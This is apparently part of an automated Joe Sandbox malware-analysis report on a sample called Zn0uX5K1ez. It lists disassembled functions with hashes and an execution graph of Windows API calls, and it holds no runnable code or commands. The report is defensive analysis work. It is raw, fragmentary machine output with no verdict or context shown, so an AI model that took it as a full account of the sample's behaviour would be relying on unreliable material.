                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6055cf1562011591c7efa2f59c71e7bec0055c2588364b64cde7401db673f1d3
                                                            • Instruction ID: 0945d97356075fac350d5ef334a988695c7f0bccdc54b151db7b89292cdc608a
                                                            • Opcode Fuzzy Hash: 6055cf1562011591c7efa2f59c71e7bec0055c2588364b64cde7401db673f1d3
                                                            • Instruction Fuzzy Hash: C1210274E0020ADFDB14DFA9C5409AEBBF1FB89300F10946AD914AB360EB359E46CF91
                                                            Function 0344D610 Relevance: .1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8a6fd2a0ab06110f9eca77bb5c27db8b52113a5db1073591736eec333023c2b3
                                                            • Instruction ID: ff446dfeec2e12ea3f6a826beb52f07c9a38ab2a104c110e314d0c41d5aad30b
                                                            • Opcode Fuzzy Hash: 8a6fd2a0ab06110f9eca77bb5c27db8b52113a5db1073591736eec333023c2b3
                                                            • Instruction Fuzzy Hash: EA21E274E0020ADFDB14DFA9C5409AEBBF1FB89300F10956AD514AB360EB359E46CF91
                                                            Function 03449D48 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bc579afdf74a9db2ef1698120e85234237bf50cbac329a94056ac79cc8aa3c57
                                                            • Instruction ID: 13abb188e46bd07e554e346b14ea9683132beb38afecf1ec242dddc3bb9f81d6
                                                            • Opcode Fuzzy Hash: bc579afdf74a9db2ef1698120e85234237bf50cbac329a94056ac79cc8aa3c57
                                                            • Instruction Fuzzy Hash: 560128347051449FD7051B3A98185ABBBEFAFCA250B188077F506C7389DE348C0257A1
                                                            Function 03449D38 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f8079283823302b310f2a6a147cb58191f20fb685025f1b9c6c57b55c56ccea6
                                                            • Instruction ID: 0b0a6cb8bf9b81fee6283f34804bf536aa610aa6095241b8529f8e419b9f2811
                                                            • Opcode Fuzzy Hash: f8079283823302b310f2a6a147cb58191f20fb685025f1b9c6c57b55c56ccea6
                                                            • Instruction Fuzzy Hash: 43012630B052409FDB141B3998186EBBBEBAFC9310F25403BE506C7349DA348C028761
                                                            Function 0344D57B Relevance: .0, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3e29839273da87e6a285daff4209f42aebe652eec8c06550ebad370d80623236
                                                            • Instruction ID: 749557ebbf1ac2e24fc46ff5552a2ed798bbf234248f5c78a8ce87bb856ba1f8
                                                            • Opcode Fuzzy Hash: 3e29839273da87e6a285daff4209f42aebe652eec8c06550ebad370d80623236
                                                            • Instruction Fuzzy Hash: 3E0105B4D00609EFDB44DFA9D5446AEBBF1FB49300F1485AAD814E7354EB309A01CF50
                                                            Function 034491F0 Relevance: .0, Instructions: 23COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 77fc9b7a7d6836c439fc2406da5302a39872a7ed1772266a5d5f75bd93ac37a2
                                                            • Instruction ID: 98b5adcc10f3fd9eaa77342794e744b3d5e69287238c03d80e8ac2d66fc9d77d
                                                            • Opcode Fuzzy Hash: 77fc9b7a7d6836c439fc2406da5302a39872a7ed1772266a5d5f75bd93ac37a2
                                                            • Instruction Fuzzy Hash: B2E09A30D0020D9FDBA4EFA9C9426AEBFB0FB04200F10816AD808D6704E2319A428B81
                                                            Function 03449200 Relevance: .0, Instructions: 17COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2119314969.0000000003440000.00000040.00000800.00020000.00000000.sdmp, Offset: 03440000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_3440000_Zn0uX5K1ez.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 95421ce9089f5aaa5bc98189440435c869fe59fe5dd4fda806b4fef5b6e9f434
                                                            • Instruction ID: e5bdb7b6aa99aa8ebec208a29ecba22522240c985a560cd5b7d8a527a43b3db3
                                                            • Opcode Fuzzy Hash: 95421ce9089f5aaa5bc98189440435c869fe59fe5dd4fda806b4fef5b6e9f434
                                                            • Instruction Fuzzy Hash: 2EE0EC70D042099FDB94EFA9C54666EBBF4AB48200F10856AD819D6244E7705A518FC1

                                                            Execution Graph

                                                            Execution Coverage:9.1%
                                                            Dynamic/Decrypted Code Coverage:0%
                                                            Signature Coverage:5%
                                                            Total number of Nodes:1488
                                                            Total number of Limit Nodes:27
                                                            execution_graph 25416 84c793 102 API calls 4 library calls 25465 849580 6 API calls 25467 84b18d 78 API calls 25417 84c793 97 API calls 4 library calls 25469 84eda7 48 API calls _unexpected 25470 84f3a0 27 API calls 25421 85a4a0 71 API calls _free 25422 84dca1 DialogBoxParamW 25423 8608a0 IsProcessorFeaturePresent 25471 836faa 111 API calls 3 library calls 25473 84b1b0 GetDlgItem EnableWindow ShowWindow SendMessageW 23518 84e5b1 23519 84e578 23518->23519 23521 84e85d 23519->23521 23547 84e5bb 23521->23547 23523 84e86d 23524 84e8ca 23523->23524 23529 84e8ee 23523->23529 23525 84e7fb DloadReleaseSectionWriteAccess 6 API calls 23524->23525 23526 84e8d5 RaiseException 23525->23526 23527 84eac3 23526->23527 23527->23519 23528 84e966 LoadLibraryExA 23530 84e9c7 23528->23530 23531 84e979 GetLastError 23528->23531 23529->23528 23529->23530 23535 84e9d9 23529->23535 23543 84ea95 23529->23543 23530->23535 23536 84e9d2 FreeLibrary 23530->23536 23532 84e9a2 23531->23532 23533 84e98c 23531->23533 23537 84e7fb DloadReleaseSectionWriteAccess 6 API calls 23532->23537 23533->23530 23533->23532 23534 84ea37 GetProcAddress 23538 84ea47 GetLastError 23534->23538 23534->23543 23535->23534 23535->23543 23536->23535 23539 84e9ad RaiseException 23537->23539 23540 84ea5a 23538->23540 23539->23527 23542 84e7fb DloadReleaseSectionWriteAccess 6 API calls 23540->23542 23540->23543 23544 84ea7b RaiseException 23542->23544 23556 84e7fb 23543->23556 23545 84e5bb ___delayLoadHelper2@8 6 API calls 23544->23545 23546 84ea92 23545->23546 23546->23543 23548 84e5c7 23547->23548 23549 84e5ed 23547->23549 23564 84e664 23548->23564 23549->23523 23551 84e5cc 23552 84e5e8 23551->23552 23567 84e78d 23551->23567 23572 84e5ee GetModuleHandleW GetProcAddress GetProcAddress 23552->23572 23555 84e836 23555->23523 23557 84e80d 23556->23557 23558 84e82f 23556->23558 23559 84e664 DloadReleaseSectionWriteAccess 3 API calls 23557->23559 23558->23527 23560 84e812 23559->23560 23561 84e82a 23560->23561 23562 84e78d DloadProtectSection 3 API calls 23560->23562 23575 84e831 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 23561->23575 23562->23561 23573 84e5ee GetModuleHandleW GetProcAddress GetProcAddress 23564->23573 23566 84e669 23566->23551 23569 84e7a2 DloadProtectSection 23567->23569 23568 84e7a8 23568->23552 23569->23568 23570 84e7dd VirtualProtect 23569->23570 23574 84e6a3 VirtualQuery GetSystemInfo 23569->23574 23570->23568 23572->23555 23573->23566 23574->23570 23575->23558 23784 84f3b2 23785 84f3be ___scrt_is_nonwritable_in_current_image 23784->23785 23816 84eed7 23785->23816 23787 84f3c5 23788 84f518 23787->23788 23791 84f3ef 23787->23791 23889 84f838 4 API calls 2 library calls 23788->23889 23790 84f51f 23882 857f58 23790->23882 23802 84f42e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 23791->23802 23827 858aed 23791->23827 23798 84f40e 23800 84f48f 23835 84f953 GetStartupInfoW __cftof 23800->23835 23802->23800 23885 857af4 38 API calls 2 library calls 23802->23885 23803 84f495 23836 858a3e 51 API calls 23803->23836 23806 84f49d 23837 84df1e 23806->23837 23810 84f4b1 23810->23790 23811 84f4b5 23810->23811 23812 84f4be 23811->23812 23887 857efb 28 API calls _abort 23811->23887 23888 84f048 12 API calls ___scrt_uninitialize_crt 23812->23888 23815 84f4c6 23815->23798 23817 84eee0 23816->23817 23891 84f654 IsProcessorFeaturePresent 23817->23891 23819 84eeec 23892 852a5e 23819->23892 23821 84eef1 23822 84eef5 23821->23822 23900 858977 23821->23900 23822->23787 23825 84ef0c 23825->23787 23830 858b04 23827->23830 23828 84fbbc CatchGuardHandler 5 API calls 23829 84f408 23828->23829 23829->23798 23831 858a91 23829->23831 23830->23828 23834 858ac0 23831->23834 23832 84fbbc CatchGuardHandler 5 API calls 23833 858ae9 23832->23833 23833->23802 23834->23832 23835->23803 23836->23806 24000 840863 23837->24000 23841 84df3d 24049 84ac16 23841->24049 23843 84df46 __cftof 23844 84df59 GetCommandLineW 23843->23844 23845 84dfe6 GetModuleFileNameW SetEnvironmentVariableW GetLocalTime 23844->23845 23846 84df68 23844->23846 24053 834092 23845->24053 24086 84c5c4 83 API calls 23846->24086 23850 84df6e 23852 84df76 OpenFileMappingW 23850->23852 23853 84dfe0 23850->23853 23854 84dfd6 CloseHandle 23852->23854 23855 84df8f MapViewOfFile 23852->23855 24088 84dbde SetEnvironmentVariableW SetEnvironmentVariableW 23853->24088 23854->23845 23858 84dfa0 __InternalCxxFrameHandler 23855->23858 23859 84dfcd UnmapViewOfFile 23855->23859 24087 84dbde SetEnvironmentVariableW SetEnvironmentVariableW 23858->24087 23859->23854 23865 8490b7 8 API calls 23867 84e0aa DialogBoxParamW 23865->23867 23866 84dfbc 23866->23859 23868 84e0e4 23867->23868 23869 84e0f6 Sleep 23868->23869 23870 84e0fd 23868->23870 23869->23870 23871 84e10b 23870->23871 24089 84ae2f CompareStringW SetCurrentDirectoryW __cftof _wcslen 23870->24089 23873 84e12a DeleteObject 23871->23873 23874 84e146 23873->23874 23875 84e13f DeleteObject 23873->23875 23876 84e177 23874->23876 23877 84e189 23874->23877 23875->23874 24090 84dc3b 6 API calls 23876->24090 24083 84ac7c 23877->24083 23880 84e17d CloseHandle 23880->23877 23881 84e1c3 23886 84f993 GetModuleHandleW 23881->23886 24340 857cd5 23882->24340 23885->23800 23886->23810 23887->23812 23888->23815 23889->23790 23891->23819 23904 853b07 23892->23904 23895 852a67 23895->23821 23897 852a6f 23898 852a7a 23897->23898 23918 853b43 DeleteCriticalSection 23897->23918 23898->23821 23947 85c05a 23900->23947 23903 852a7d 7 API calls 2 library calls 23903->23822 23905 853b10 23904->23905 23907 853b39 23905->23907 23909 852a63 23905->23909 23919 853d46 23905->23919 23924 853b43 DeleteCriticalSection 23907->23924 23909->23895 23910 852b8c 23909->23910 23940 853c57 23910->23940 23914 852baf 23915 852bbc 23914->23915 23946 852bbf 6 API calls ___vcrt_FlsFree 23914->23946 23915->23897 23917 852ba1 23917->23897 23918->23895 23925 853c0d 23919->23925 23922 853d7e InitializeCriticalSectionAndSpinCount 23923 853d69 23922->23923 23923->23905 23924->23909 23926 853c26 23925->23926 23927 853c4f 23925->23927 23926->23927 23932 853b72 23926->23932 23927->23922 23927->23923 23930 853c3b GetProcAddress 23930->23927 23931 853c49 23930->23931 23931->23927 23938 853b7e ___vcrt_InitializeCriticalSectionEx 23932->23938 23933 853bf3 23933->23927 23933->23930 23934 853b95 LoadLibraryExW 23935 853bb3 GetLastError 23934->23935 23936 853bfa 23934->23936 23935->23938 23936->23933 23937 853c02 FreeLibrary 23936->23937 23937->23933 23938->23933 23938->23934 23939 853bd5 LoadLibraryExW 23938->23939 23939->23936 23939->23938 23941 853c0d ___vcrt_InitializeCriticalSectionEx 5 API calls 23940->23941 23942 853c71 23941->23942 23943 853c8a TlsAlloc 23942->23943 23944 852b96 23942->23944 23944->23917 23945 853d08 6 API calls ___vcrt_InitializeCriticalSectionEx 23944->23945 23945->23914 23946->23917 23950 85c077 23947->23950 23951 85c073 23947->23951 23948 84fbbc CatchGuardHandler 5 API calls 23949 84eefe 23948->23949 23949->23825 23949->23903 23950->23951 23953 85a6a0 23950->23953 23951->23948 23954 85a6ac ___scrt_is_nonwritable_in_current_image 23953->23954 23965 85ac31 EnterCriticalSection 23954->23965 23956 85a6b3 23966 85c528 23956->23966 23958 85a6c2 23964 85a6d1 23958->23964 23979 85a529 29 API calls 23958->23979 23961 85a6cc 23980 85a5df GetStdHandle GetFileType 23961->23980 23962 85a6e2 _abort 23962->23950 23981 85a6ed LeaveCriticalSection _abort 23964->23981 23965->23956 23967 85c534 ___scrt_is_nonwritable_in_current_image 23966->23967 23968 85c541 23967->23968 23969 85c558 23967->23969 23990 8591a8 20 API calls _abort 23968->23990 23982 85ac31 EnterCriticalSection 23969->23982 23972 85c546 23991 859087 26 API calls __cftof 23972->23991 23974 85c590 23992 85c5b7 LeaveCriticalSection _abort 23974->23992 23975 85c550 _abort 23975->23958 23976 85c564 23976->23974 23983 85c479 23976->23983 23979->23961 23980->23964 23981->23962 23982->23976 23984 85b136 _abort 20 API calls 23983->23984 23986 85c48b 23984->23986 23985 85c498 23987 858dcc _free 20 API calls 23985->23987 23986->23985 23993 85af0a 23986->23993 23989 85c4ea 23987->23989 23989->23976 23990->23972 23991->23975 23992->23975 23994 85ac98 _abort 5 API calls 23993->23994 23995 85af31 23994->23995 23996 85af4f InitializeCriticalSectionAndSpinCount 23995->23996 23999 85af3a 23995->23999 23996->23999 23997 84fbbc CatchGuardHandler 5 API calls 23998 85af66 23997->23998 23998->23986 23999->23997 24091 84ec50 24000->24091 24003 8408e7 24005 840c14 GetModuleFileNameW 24003->24005 24102 8575fb 42 API calls __vsnwprintf_l 24003->24102 24004 840888 GetProcAddress 24006 8408a1 24004->24006 24007 8408b9 GetProcAddress 24004->24007 24016 840c32 24005->24016 24006->24007 24008 8408cb 24007->24008 24008->24003 24010 840b54 24010->24005 24011 840b5f GetModuleFileNameW CreateFileW 24010->24011 24012 840b8f SetFilePointer 24011->24012 24013 840c08 CloseHandle 24011->24013 24012->24013 24014 840b9d ReadFile 24012->24014 24013->24005 24014->24013 24017 840bbb 24014->24017 24019 840c94 GetFileAttributesW 24016->24019 24021 840c5d CompareStringW 24016->24021 24022 840cac 24016->24022 24093 83b146 24016->24093 24096 84081b 24016->24096 24017->24013 24020 84081b 2 API calls 24017->24020 24019->24016 24019->24022 24020->24017 24021->24016 24023 840cb7 24022->24023 24025 840cec 24022->24025 24026 840cd0 GetFileAttributesW 24023->24026 24028 840ce8 24023->24028 24024 840dfb 24048 84a64d GetCurrentDirectoryW 24024->24048 24025->24024 24027 83b146 GetVersionExW 24025->24027 24026->24023 24026->24028 24029 840d06 24027->24029 24028->24025 24030 840d73 24029->24030 24031 840d0d 24029->24031 24032 834092 _swprintf 51 API calls 24030->24032 24033 84081b 2 API calls 24031->24033 24034 840d9b AllocConsole 24032->24034 24035 840d17 24033->24035 24036 840df3 ExitProcess 24034->24036 24037 840da8 GetCurrentProcessId AttachConsole 24034->24037 24038 84081b 2 API calls 24035->24038 24107 853e13 24037->24107 24040 840d21 24038->24040 24103 83e617 24040->24103 24041 840dc9 GetStdHandle WriteConsoleW Sleep FreeConsole 24041->24036 24044 834092 _swprintf 51 API calls 24045 840d4f 24044->24045 24046 83e617 53 API calls 24045->24046 24047 840d5e 24046->24047 24047->24036 24048->23841 24050 84081b 2 API calls 24049->24050 24051 84ac2a OleInitialize 24050->24051 24052 84ac4d GdiplusStartup SHGetMalloc 24051->24052 24052->23843 24132 834065 24053->24132 24056 84b6dd LoadBitmapW 24057 84b6fe 24056->24057 24058 84b70b GetObjectW 24056->24058 24166 84a6c2 FindResourceW 24057->24166 24060 84b71a 24058->24060 24161 84a5c6 24060->24161 24063 84b770 24075 83da42 24063->24075 24065 84b74c 24182 84a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24065->24182 24066 84a6c2 13 API calls 24069 84b73d 24066->24069 24068 84b754 24183 84a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24068->24183 24069->24065 24071 84b743 DeleteObject 24069->24071 24071->24065 24072 84b75d 24184 84a80c 8 API calls 24072->24184 24074 84b764 DeleteObject 24074->24063 24195 83da67 24075->24195 24080 8490b7 24328 84eb38 24080->24328 24084 84acab GdiplusShutdown CoUninitialize 24083->24084 24084->23881 24086->23850 24087->23866 24088->23845 24089->23871 24090->23880 24092 84086d GetModuleHandleW 24091->24092 24092->24003 24092->24004 24094 83b196 24093->24094 24095 83b15a GetVersionExW 24093->24095 24094->24016 24095->24094 24097 84ec50 24096->24097 24098 840828 GetSystemDirectoryW 24097->24098 24099 840840 24098->24099 24100 84085e 24098->24100 24101 840851 LoadLibraryW 24099->24101 24100->24016 24101->24100 24102->24010 24104 83e627 24103->24104 24109 83e648 24104->24109 24108 853e1b 24107->24108 24108->24041 24108->24108 24115 83d9b0 24109->24115 24112 83e645 24112->24044 24113 83e66b LoadStringW 24113->24112 24114 83e682 LoadStringW 24113->24114 24114->24112 24120 83d8ec 24115->24120 24117 83d9cd 24118 83d9e2 24117->24118 24128 83d9f0 26 API calls 24117->24128 24118->24112 24118->24113 24121 83d904 24120->24121 24127 83d984 _strncpy 24120->24127 24123 83d928 24121->24123 24129 841da7 WideCharToMultiByte 24121->24129 24126 83d959 24123->24126 24130 83e5b1 50 API calls __vsnprintf 24123->24130 24131 856159 26 API calls 3 library calls 24126->24131 24127->24117 24128->24118 24129->24123 24130->24126 24131->24127 24133 83407c __vsnwprintf_l 24132->24133 24136 855fd4 24133->24136 24139 854097 24136->24139 24140 8540d7 24139->24140 24141 8540bf 24139->24141 24140->24141 24142 8540df 24140->24142 24156 8591a8 20 API calls _abort 24141->24156 24144 854636 __cftof 38 API calls 24142->24144 24146 8540ef 24144->24146 24145 8540c4 24157 859087 26 API calls __cftof 24145->24157 24158 854601 20 API calls 2 library calls 24146->24158 24148 84fbbc CatchGuardHandler 5 API calls 24150 834086 SetEnvironmentVariableW GetModuleHandleW LoadIconW 24148->24150 24150->24056 24151 854167 24159 8549e6 51 API calls 4 library calls 24151->24159 24154 854172 24160 8546b9 20 API calls _free 24154->24160 24155 8540cf 24155->24148 24156->24145 24157->24155 24158->24151 24159->24154 24160->24155 24185 84a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24161->24185 24163 84a5cd 24165 84a5d9 24163->24165 24186 84a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24163->24186 24165->24063 24165->24065 24165->24066 24167 84a6e5 SizeofResource 24166->24167 24168 84a7d3 24166->24168 24167->24168 24169 84a6fc LoadResource 24167->24169 24168->24058 24168->24060 24169->24168 24170 84a711 LockResource 24169->24170 24170->24168 24171 84a722 GlobalAlloc 24170->24171 24171->24168 24172 84a73d GlobalLock 24171->24172 24173 84a7cc GlobalFree 24172->24173 24174 84a74c __InternalCxxFrameHandler 24172->24174 24173->24168 24175 84a754 CreateStreamOnHGlobal 24174->24175 24176 84a7c5 GlobalUnlock 24175->24176 24177 84a76c 24175->24177 24176->24173 24187 84a626 GdipAlloc 24177->24187 24180 84a7b0 24180->24176 24181 84a79a GdipCreateHBITMAPFromBitmap 24181->24180 24182->24068 24183->24072 24184->24074 24185->24163 24186->24165 24188 84a645 24187->24188 24189 84a638 24187->24189 24188->24176 24188->24180 24188->24181 24191 84a3b9 24189->24191 24192 84a3e1 GdipCreateBitmapFromStream 24191->24192 24193 84a3da GdipCreateBitmapFromStreamICM 24191->24193 24194 84a3e6 24192->24194 24193->24194 24194->24188 24196 83da75 __EH_prolog 24195->24196 24197 83daa4 GetModuleFileNameW 24196->24197 24198 83dad5 24196->24198 24199 83dabe 24197->24199 24241 8398e0 24198->24241 24199->24198 24201 83db31 24252 856310 24201->24252 24205 83db05 24205->24201 24207 83e261 78 API calls 24205->24207 24219 83dd4a 24205->24219 24206 83db44 24208 856310 26 API calls 24206->24208 24207->24205 24216 83db56 ___vcrt_InitializeCriticalSectionEx 24208->24216 24209 83dc85 24209->24219 24288 839d70 81 API calls 24209->24288 24213 83dc9f ___std_exception_copy 24214 839bd0 82 API calls 24213->24214 24213->24219 24217 83dcc8 ___std_exception_copy 24214->24217 24216->24209 24216->24219 24266 839e80 24216->24266 24282 839bd0 24216->24282 24287 839d70 81 API calls 24216->24287 24217->24219 24236 83dcd3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24217->24236 24289 841b84 MultiByteToWideChar 24217->24289 24275 83959a 24219->24275 24220 83e159 24226 83e1de 24220->24226 24295 858cce 26 API calls 2 library calls 24220->24295 24223 83e16e 24296 857625 26 API calls 2 library calls 24223->24296 24224 83e1c6 24297 83e27c 78 API calls 24224->24297 24225 83e214 24228 856310 26 API calls 24225->24228 24226->24225 24230 83e261 78 API calls 24226->24230 24231 83e22d 24228->24231 24230->24226 24232 856310 26 API calls 24231->24232 24232->24219 24234 841da7 WideCharToMultiByte 24234->24236 24236->24219 24236->24220 24236->24234 24290 83e5b1 50 API calls __vsnprintf 24236->24290 24291 856159 26 API calls 3 library calls 24236->24291 24292 858cce 26 API calls 2 library calls 24236->24292 24293 857625 26 API calls 2 library calls 24236->24293 24294 83e27c 78 API calls 24236->24294 24239 83e29e GetModuleHandleW FindResourceW 24240 83da55 24239->24240 24240->24080 24242 8398ea 24241->24242 24243 83994b CreateFileW 24242->24243 24244 83996c GetLastError 24243->24244 24247 8399bb 24243->24247 24298 83bb03 24244->24298 24246 83998c 24246->24247 24249 839990 CreateFileW GetLastError 24246->24249 24248 8399ff 24247->24248 24250 8399e5 SetFileTime 24247->24250 24248->24205 24249->24247 24251 8399b5 24249->24251 24250->24248 24251->24247 24253 856349 24252->24253 24254 85634d 24253->24254 24265 856375 24253->24265 24302 8591a8 20 API calls _abort 24254->24302 24256 856352 24303 859087 26 API calls __cftof 24256->24303 24257 84fbbc CatchGuardHandler 5 API calls 24260 8566a6 24257->24260 24259 85635d 24261 84fbbc CatchGuardHandler 5 API calls 24259->24261 24260->24206 24262 856369 24261->24262 24262->24206 24264 856699 24264->24257 24265->24264 24304 856230 5 API calls CatchGuardHandler 24265->24304 24267 839e92 24266->24267 24270 839ea5 24266->24270 24272 839eb0 24267->24272 24305 836d5b 77 API calls 24267->24305 24268 839eb8 SetFilePointer 24271 839ed4 GetLastError 24268->24271 24268->24272 24270->24268 24270->24272 24271->24272 24273 839ede 24271->24273 24272->24216 24273->24272 24306 836d5b 77 API calls 24273->24306 24276 8395cf 24275->24276 24277 8395be 24275->24277 24276->24239 24277->24276 24278 8395d1 24277->24278 24279 8395ca 24277->24279 24312 839620 24278->24312 24307 83974e 24279->24307 24283 839bdc 24282->24283 24285 839be3 24282->24285 24283->24216 24285->24283 24286 839785 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24285->24286 24327 836d1a 77 API calls 24285->24327 24286->24285 24287->24216 24288->24213 24289->24236 24290->24236 24291->24236 24292->24236 24293->24236 24294->24236 24295->24223 24296->24224 24297->24226 24299 83bb10 _wcslen 24298->24299 24300 83bbb8 GetCurrentDirectoryW 24299->24300 24301 83bb39 _wcslen 24299->24301 24300->24301 24301->24246 24302->24256 24303->24259 24304->24265 24305->24270 24306->24272 24308 839781 24307->24308 24309 839757 24307->24309 24308->24276 24309->24308 24318 83a1e0 24309->24318 24313 83964a 24312->24313 24315 83962c 24312->24315 24314 839669 24313->24314 24326 836bd5 76 API calls 24313->24326 24314->24276 24315->24313 24316 839638 CloseHandle 24315->24316 24316->24313 24319 84ec50 24318->24319 24320 83a1ed DeleteFileW 24319->24320 24321 83a200 24320->24321 24322 83977f 24320->24322 24323 83bb03 GetCurrentDirectoryW 24321->24323 24322->24276 24324 83a214 24323->24324 24324->24322 24325 83a218 DeleteFileW 24324->24325 24325->24322 24326->24314 24327->24285 24330 84eb3d ___std_exception_copy 24328->24330 24329 8490d6 24329->23865 24330->24329 24333 84eb59 24330->24333 24337 857a5e 7 API calls 2 library calls 24330->24337 24332 84f5c9 24339 85238d RaiseException 24332->24339 24333->24332 24338 85238d RaiseException 24333->24338 24335 84f5e6 24337->24330 24338->24332 24339->24335 24341 857ce1 _unexpected 24340->24341 24342 857ce8 24341->24342 24343 857cfa 24341->24343 24376 857e2f GetModuleHandleW 24342->24376 24364 85ac31 EnterCriticalSection 24343->24364 24346 857ced 24346->24343 24377 857e73 GetModuleHandleExW 24346->24377 24347 857d9f 24365 857ddf 24347->24365 24351 857d76 24355 857d8e 24351->24355 24360 858a91 _abort 5 API calls 24351->24360 24353 857dbc 24368 857dee 24353->24368 24354 857de8 24386 862390 5 API calls CatchGuardHandler 24354->24386 24361 858a91 _abort 5 API calls 24355->24361 24356 857d01 24356->24347 24356->24351 24385 8587e0 20 API calls _abort 24356->24385 24360->24355 24361->24347 24364->24356 24387 85ac81 LeaveCriticalSection 24365->24387 24367 857db8 24367->24353 24367->24354 24388 85b076 24368->24388 24371 857e1c 24374 857e73 _abort 8 API calls 24371->24374 24372 857dfc GetPEB 24372->24371 24373 857e0c GetCurrentProcess TerminateProcess 24372->24373 24373->24371 24375 857e24 ExitProcess 24374->24375 24376->24346 24378 857ec0 24377->24378 24379 857e9d GetProcAddress 24377->24379 24381 857ec6 FreeLibrary 24378->24381 24382 857ecf 24378->24382 24380 857eb2 24379->24380 24380->24378 24381->24382 24383 84fbbc CatchGuardHandler 5 API calls 24382->24383 24384 857cf9 24383->24384 24384->24343 24385->24351 24387->24367 24389 85b09b 24388->24389 24393 85b091 24388->24393 24390 85ac98 _abort 5 API calls 24389->24390 24390->24393 24391 84fbbc CatchGuardHandler 5 API calls 24392 857df8 24391->24392 24392->24371 24392->24372 24393->24391 25475 841bbd GetCPInfo IsDBCSLeadByte 25476 85b1b8 27 API calls 2 library calls 25477 84b5c0 100 API calls 25478 8477c0 118 API calls 25479 84ffc0 RaiseException _com_error::_com_error CallUnexpected 24401 84dec2 24402 84decf 24401->24402 24403 83e617 53 API calls 24402->24403 24404 84dedc 24403->24404 24405 834092 _swprintf 51 API calls 24404->24405 24406 84def1 SetDlgItemTextW 24405->24406 24409 84b568 PeekMessageW 24406->24409 24410 84b583 GetMessageW 24409->24410 24411 84b5bc 24409->24411 24412 84b5a8 TranslateMessage DispatchMessageW 24410->24412 24413 84b599 IsDialogMessageW 24410->24413 24412->24411 24413->24411 24413->24412 25426 8462ca 123 API calls __InternalCxxFrameHandler 24420 84e2d7 24421 84e1db 24420->24421 24422 84e85d ___delayLoadHelper2@8 14 API calls 24421->24422 24422->24421 24425 84e1d1 14 API calls ___delayLoadHelper2@8 25482 85a3d0 21 API calls 2 library calls 24426 8310d5 24431 835abd 24426->24431 24432 835ac7 __EH_prolog 24431->24432 24438 83b505 24432->24438 24434 835ad3 24444 835cac GetCurrentProcess GetProcessAffinityMask 24434->24444 24439 83b50f __EH_prolog 24438->24439 24445 83f1d0 82 API calls 24439->24445 24441 83b521 24446 83b61e 24441->24446 24445->24441 24447 83b630 __cftof 24446->24447 24450 8410dc 24447->24450 24453 84109e GetCurrentProcess GetProcessAffinityMask 24450->24453 24454 83b597 24453->24454 24454->24434 25483 862bd0 VariantClear 25429 84f4d3 20 API calls 25430 850ada 51 API calls 2 library calls 24549 8313e1 84 API calls 2 library calls 24550 84eae7 24551 84eaf1 24550->24551 24552 84e85d ___delayLoadHelper2@8 14 API calls 24551->24552 24553 84eafe 24552->24553 25431 84f4e7 29 API calls _abort 24554 84b7e0 24555 84b7ea __EH_prolog 24554->24555 24722 831316 24555->24722 24558 84bf0f 24787 84d69e 24558->24787 24559 84b82a 24561 84b838 24559->24561 24562 84b89b 24559->24562 24637 84b841 24559->24637 24564 84b83c 24561->24564 24565 84b878 24561->24565 24568 84b92e GetDlgItemTextW 24562->24568 24572 84b8b1 24562->24572 24574 83e617 53 API calls 24564->24574 24564->24637 24576 84b95f EndDialog 24565->24576 24565->24637 24566 84bf38 24569 84bf41 SendDlgItemMessageW 24566->24569 24570 84bf52 GetDlgItem 